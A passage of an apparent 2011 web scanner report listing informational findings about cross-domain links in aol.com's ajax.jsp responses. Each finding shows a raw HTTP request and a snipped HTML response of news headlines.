Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-88.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2565
Set-Cookie: JSESSIONID=B9F7370BCEB98D0ACC0CDAFF73CC8AD5; Path=/aol
Content-Length: 2565

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl13 plid-87524 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
<a id="dlimg" name="om_dl13_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl13|sec1_lnk1|87524" href="http://autos.aol.com/article/michele-bachmanns-2-gas-sideshow/"><img height="217" alt="Republican presidential candidate, Rep. Michele Bachmann, R-Minn., speaks to supporters at the Beacon Drive-in, Tuesday, Aug. 16, 2011, in Spartanburg, S.C." width="386" src="http://i.huffpost.com/gen/332591/thumbs/a-BACHMANGAS-386x217.jpg"/></a>
...[SNIP]...
<li ><a name="om_dl13_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl13|sec3_lnk1|87524" href="http://www.autoblog.com/2011/08/17/r-c-car-takes-hydroplaning-to-a-new-level/">Watch: Tiny Car Rides on Water</a>
...[SNIP]...
<li ><a name="om_dl13_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl13|sec3_lnk3|87524" href="http://www.autoblog.com/2011/08/05/dodge-durango-smacks-around-ford-explorer-in-latest-tv-ads/">Popular Ford Ripped in Two New Ads</a>
...[SNIP]...

6.8. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=4&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; dlact=dl3

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:13:50 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-62.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2334
Set-Cookie: JSESSIONID=5171F8DE5E1C0C6ADA310F19A4EFAF2D; Path=/aol
Content-Length: 2334

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl4 plid-87593 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl4_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl4|sec1_lnk1|87593" href="http://www.aoltv.com/2011/08/18/la-ink-canceled-by-tlc/"><img height="217" alt="Kat Von D" width="386" src="http://i.huffpost.com/gen/332787/thumbs/a-KAT-VON-D-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl4_hdln" href="http://www.aoltv.com/2011/08/18/la-ink-canceled-by-tlc/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl4|sec1_lnk2|87593">Kat Von D Is Dealt Another Blow
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl4_cpy" href="http://www.aoltv.com/2011/08/18/la-ink-canceled-by-tlc/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl4|sec1_lnk3|87593">Bad news that doesn't just hurt her
</a>
...[SNIP]...
<li ><a name="om_dl4_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl4|sec3_lnk1|87593" href="http://www.aoltv.com/2011/08/18/sarah-silverman-nbc-pilot/">Raunchy Comedian Headed to NBC
</a>
...[SNIP]...
<li ><a name="om_dl4_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl4|sec3_lnk2|87593" href="http://www.huffingtonpost.com/2011/08/18/betty-white-is-americas-most-trusted-celebrity_n_930740.html">Most Trusted Celeb in America Is ...
</a>
...[SNIP]...
<li ><a name="om_dl4_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl4|sec3_lnk3|87593" href="http://www.spinner.com/2011/08/18/kanye-west-amy-winehouse-cover/">Kanye West to Cover Winehouse?
</a>
...[SNIP]...

6.9. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=22&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl22

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:17:52 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-43.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2436
Set-Cookie: JSESSIONID=A6301CF306A8999CE66D211457018045; Path=/aol
Content-Length: 2436

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl22 plid-87527 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl22_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl22|sec1_lnk1|87527" href="http://www.stylelist.com/2011/08/18/jenna-lyons-office-photos_n_929919.html"><img height="217" alt="Jenna Lyons in Office" width="386" src="http://o.aolcdn.com/hss/storage/adam/4654db7733606e6b2c325f67ea6a8d38/jenna-lyons-j-crew-office-386kk.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl22_hdln" href="http://www.stylelist.com/2011/08/18/jenna-lyons-office-photos_n_929919.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl22|sec1_lnk2|87527">We Looked Inside the J. Crew Office
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl22_cpy" href="http://www.stylelist.com/2011/08/18/jenna-lyons-office-photos_n_929919.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl22|sec1_lnk3|87527">What you won't see in the stores</a>
...[SNIP]...
<li ><a name="om_dl22_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl22|sec3_lnk1|87527" href="http://www.stylelist.com/2011/08/18/fashion-intern-diaries_n_929384.html">Interns Reveal Fashion's Secrets</a>
...[SNIP]...
<li ><a name="om_dl22_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl22|sec3_lnk2|87527" href="http://www.stylelist.com/2011/08/18/demi-moore-ghost_n_929542.html">Famous Demi Moore Look Inspires</a>
...[SNIP]...
<li ><a name="om_dl22_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl22|sec3_lnk3|87527" href="http://www.stylelist.com/2011/08/18/w-magazine-september-issue_n_929997.html">Behind the Scenes of Mag's Cover</a>
...[SNIP]...

6.10. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=7&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html, */*; q=0.01
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/?r=404
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Cookie: dlact=dl7; rrpmo1=rr1~1~1313709994071~0; stips5=1; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_vi=[CS]v1|2726CFD6851D2017-600001416006DA93[CE]; s_pers=%20s_getnr%3D1313710009932-New%7C1376782009932%3B%20s_nrgvo%3DNew%7C1376782009933%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 23:27:41 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-91.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2474
Set-Cookie: JSESSIONID=02B1F250AA5AFDB863938536E2691A3D; Path=/aol
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Length: 2474

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl7 plid-87589 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl7_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl7|sec1_lnk1|87589" href="http://www.huffingtonpost.com/2011/08/18/norway-attacks-anders-behring-breivik-called-police_n_930617.html"><img height="217" alt="Norway Attacks" width="386" src="http://i.huffpost.com/gen/332778/thumbs/a-NORWAY-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl7_hdln" href="http://www.huffingtonpost.com/2011/08/18/norway-attacks-anders-behring-breivik-called-police_n_930617.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl7|sec1_lnk2|87589">New Details in Norway Massacre
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl7_cpy" href="http://www.huffingtonpost.com/2011/08/18/norway-attacks-anders-behring-breivik-called-police_n_930617.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl7|sec1_lnk3|87589">Who he dialed (& hung up on) twice
</a>
...[SNIP]...
<li ><a name="om_dl7_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl7|sec3_lnk1|87589" href="http://www.foxnews.com/world/2011/08/18/israel-radio-says-second-bus-attacked-by-gunfire/">Israel Attacked by 'Terror Squad'</a>
...[SNIP]...
<li ><a name="om_dl7_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl7|sec3_lnk2|87589" href="http://www.huffingtonpost.com/2011/08/18/texas-drought-2011-town_n_930308.html">US City May Run Out of Water</a>
...[SNIP]...
<li ><a name="om_dl7_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl7|sec3_lnk3|87589" href="http://www.huffingtonpost.com/2011/08/18/jon-stewart-rips-ed-schultz_n_930618.html">Jon Stewart Rips Into Ed Schultz</a>
...[SNIP]...

6.11. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=2&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; dlact=dl1

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:14:15 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-72.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2585
Set-Cookie: JSESSIONID=B92B7293052AC58647149B705F4817A1; Path=/aol
Content-Length: 2585

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl2 plid-87611 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl2_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl2|sec1_lnk1|87611" href="http://www.tmz.com/2011/08/18/mary-ingalls-melissa-sue-anderson-little-house-on-the-prairie-memba-her-gorwn-up/"><img height="217" alt="Mary Ingalls on 'Prairie'" width="386" src="http://o.aolcdn.com/hss/storage/adam/ccb1b5a053b320c237c4b35debfacdf4/tmz2-386az08182011.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl2_hdln" href="http://www.tmz.com/2011/08/18/mary-ingalls-melissa-sue-anderson-little-house-on-the-prairie-memba-her-gorwn-up/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl2|sec1_lnk2|87611">Remember Mary Ingalls on 'Prairie'?


</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl2_cpy" href="http://www.tmz.com/2011/08/18/mary-ingalls-melissa-sue-anderson-little-house-on-the-prairie-memba-her-gorwn-up/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl2|sec1_lnk3|87611">She still looks angelic today at 48
</a>
...[SNIP]...
<li ><a name="om_dl2_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl2|sec3_lnk1|87611" href="http://www.huffingtonpost.com/2011/08/18/chaz-bono-becoming-chaz-emmy-nominations-beard_n_930324.html">Chaz Bono's Post-Sex Change Beard

</a>
...[SNIP]...
<li ><a name="om_dl2_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl2|sec3_lnk2|87611" href="http://www.huffingtonpost.com/2011/08/18/jerry-springer-sean-hannity_n_930477.html">Jerry Springer Ripped Into TV Host
</a>
...[SNIP]...
<li ><a name="om_dl2_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl2|sec3_lnk3|87611" href="http://www.spinner.com/2011/08/18/smith-westerns-pukkelpop-stage-collapse/">Report: Another Fatal Stage Collapse</a>
...[SNIP]...

6.12. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=12&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl12

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:15:59 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-50.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2805
Set-Cookie: JSESSIONID=A0EE6086337403D6DF93310AE04A902E; Path=/aol
Content-Length: 2805

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl12 plid-87526 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl12_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl12|sec1_lnk1|87526" href="http://www.whattoexpect.com/toddler/photo-gallery/fast-ways-to-stop-toddler-tantrums.aspx?xid=aol_wte-preg_2-_20110815&amp;aolcat=HLT#/slide-1"><img height="217" alt="Child Crying" width="386" src="http://i.huffpost.com/gen/332395/thumbs/a-TANTRUM-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl12_hdln" onclick=" " href="http://www.whattoexpect.com/toddler/photo-gallery/fast-ways-to-stop-toddler-tantrums.aspx?xid=aol_wte-preg_2-_20110815&amp;aolcat=HLT#/slide-1" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl12|sec1_lnk2|87526">Fast Ways to Stop Those Tantrums</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl12_cpy" href="http://www.whattoexpect.com/toddler/photo-gallery/fast-ways-to-stop-toddler-tantrums.aspx?xid=aol_wte-preg_2-_20110815&amp;aolcat=HLT#/slide-1" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl12|sec1_lnk3|87526">Trick to end with loud screaming</a>
...[SNIP]...
<li ><a name="om_dl12_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl12|sec3_lnk1|87526" href="http://www.everydayhealth.com/type-2-diabetes-pictures/joy-bauer-foods-to-avoid-when-you-have-diabetes.aspx?xid=aol_eh-endo_39-_20110815&amp;aolcat=APS">9 Foods Diabetics Should Avoid </a>
...[SNIP]...
<li ><a name="om_dl12_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl12|sec3_lnk2|87526" href="http://www.everydayhealth.com/womens-health/0818/annual-pap-tests-often-ordered-but-unneeded.aspx?xid=aol_eh-news_29-_20110815&amp;aolcat=HLT">New Findings on Annual Pap Test </a>
...[SNIP]...
<li ><a name="om_dl12_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl12|sec3_lnk3|87526" href="http://www.everydayhealth.com/lung-cancer/0818/sniffer-dogs-spot-early-stage-lung-cancer.aspx?xid=aol_eh-news_30-_20110815&amp;aolcat=HLT">Can Dogs Sniff Out Lung Cancer?</a>
...[SNIP]...

6.13. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=10&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl10

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:15:36 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-174-51.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2809
Set-Cookie: JSESSIONID=374CB13FC53E46BE0AEA32117E821D99; Path=/aol
Content-Length: 2809

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl10 plid-87550 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl10_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl10|sec1_lnk1|87550" href="http://aol.sportingnews.com/ncaa-basketball/story/2011-08-18/georgetown-game-in-china-ends-in-bench-clearing-brawl"><img height="217" alt="Georgetown coach John Thompson III pulled the Hoyas off the court in Beijing on Thursday after a bench-clearing brawl erupted during the fourth quarter of an exhibition game against the Bayi Rockets." width="386" src="http://i.huffpost.com/gen/332650/thumbs/a-CHINABRAWL-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl10_hdln" href="http://aol.sportingnews.com/ncaa-basketball/story/2011-08-18/georgetown-game-in-china-ends-in-bench-clearing-brawl" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl10|sec1_lnk2|87550">Georgetown-China Game Ends in Brawl</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl10_cpy" href="http://aol.sportingnews.com/ncaa-basketball/story/2011-08-18/georgetown-game-in-china-ends-in-bench-clearing-brawl" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl10|sec1_lnk3|87550">Watch: It spirals out of control quickly</a>
...[SNIP]...
<li ><a name="om_dl10_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl10|sec3_lnk1|87550" href="http://www.huffingtonpost.com/2011/08/18/hideki-irabus-cause-of-death_n_930463.html">Coroner: Ex-Yankee Killed Himself</a>
...[SNIP]...
<li ><a name="om_dl10_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl10|sec3_lnk2|87550" href="http://aol.sportingnews.com/sport/story/2011-08-18/tiger-woods-lebron-james-accused-of-being-cheap-tippers">Tiger and LeBron Called Cheap Tippers</a>
...[SNIP]...
<li ><a name="om_dl10_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl10|sec3_lnk3|87550" href="http://www.mmafighting.com/2011/08/18/ufc-and-fox-officially-announce-details-of-landmark-7-year-broad/">UFC Confirms Major New TV Deal</a>
...[SNIP]...

6.14. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=local&t=cod HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:14:00 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-107-100.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Set-Cookie: JSESSIONID=E7A04E3CBE28F4E972AC4DDE0CD37F71; Path=/aol
Content-Length: 12307

<div id="local-module" class="gmod mnid-local plid-87491">
<div id="localheader">

<h2>Local News and Weather</h2>

<div id="localstories_location" class="localeditspace">
<div class="citySta
...[SNIP]...
<a href="" name="om_localclose" id="locationclose" class="lnid-sec1_lnk4 sprite"><img src="http://portal.aolcdn.com/p5/_v58.6/css/maing.png" alt="Cancel"></a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk1 tooltips" name="om_local_1" href="http://www.nbcdfw.com/news/local/Hunt-Co-Brush-Fire-Burning-Several-Acres-128037173.html" target='_blank' >Brush Fire Burns Several Acres in Hunt Co.</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk2 tooltips" name="om_local_2" href="http://dfw.cbslocal.com/2011/08/18/good-samaritan-fights-current-to-save-drowning-boy/" target='_blank' >Good Samaritan Fights Current To Save...</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk3 tooltips" name="om_local_3" href="http://www.cbssports.com/nfl/story/15450124/mcmahon-former-players-sue-nfl-over-concussions/rss" target='_blank' >McMahon, former players sue NFL over...</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk4 tooltips" name="om_local_4" href="http://www.nbcdfw.com/news/politics/Ron-Paul-Fan-Looking-for-Dirt-on-Rick-Perry-128013098.html" target='_blank' >Ron Paul Fan Digging for Dirt on Rick...</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk5 tooltips" name="om_local_5" href="http://www.nbcdfw.com/weather/stories/Dallas-Facing-Water-Problems-if-Drought-Continues-128032383.html" target='_blank' >Dallas Facing Water Problems if Drought...</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk6 tooltips" name="om_local_6" href="http://www.star-telegram.com/2011/08/18/3299308/eastbound-i-30-at-lockheed-blvd.html" target='_blank' >Eastbound I-30 at Lockheed Blvd. in Fort...</a>
...[SNIP]...
</span>
